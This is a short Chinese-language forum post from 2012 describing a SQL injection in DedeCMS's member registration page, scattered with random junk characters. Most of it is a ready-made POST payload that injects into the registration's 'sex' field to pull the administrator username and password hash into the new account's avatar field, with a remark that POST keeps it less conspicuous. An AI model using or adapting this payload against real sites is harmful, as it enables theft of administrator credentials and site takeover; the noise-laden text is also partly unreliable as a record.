dedecms版本 20121122
) S! N8 h6 H% u3 Y0 \1 k. X" ?, Z, n$ D% G1 s; h$ i. E1 R
需要magic_quotes_gpc=Off8 q- p9 ?2 v* l
& h: D& w% A$ p |
应该是没有什么大危害的漏洞./ N8 a6 y' T1 C5 R5 ^
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
# R, n) C% L- H- @" K6 u% b, I6 K" i) x: v( ^: h( c
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.9 F+ g4 _" w2 q, x1 o
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
5 x+ R5 W' F- A/ S6 {2 k/ n* l- \" a
http:///de/member/reg_new.php/ Y Y- z$ [: b. m# L* L
' n) t0 K' {% V0 D' t3 yPOST& P9 \8 X6 [6 B$ s" Z
3 S" K& x: y0 j# m1 P$ q# {dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=/ H& L4 v1 K* Y, [0 X
' Y1 Y/ h l5 K8 U% Q: [+ B
成功注册后,头像处里面有好玩的信息.2 K. S7 P; w: q a: j( n
' a; b U( E9 C6 f4 W
|
发表于 2012-12-5 10:03:32
收藏
支持
反对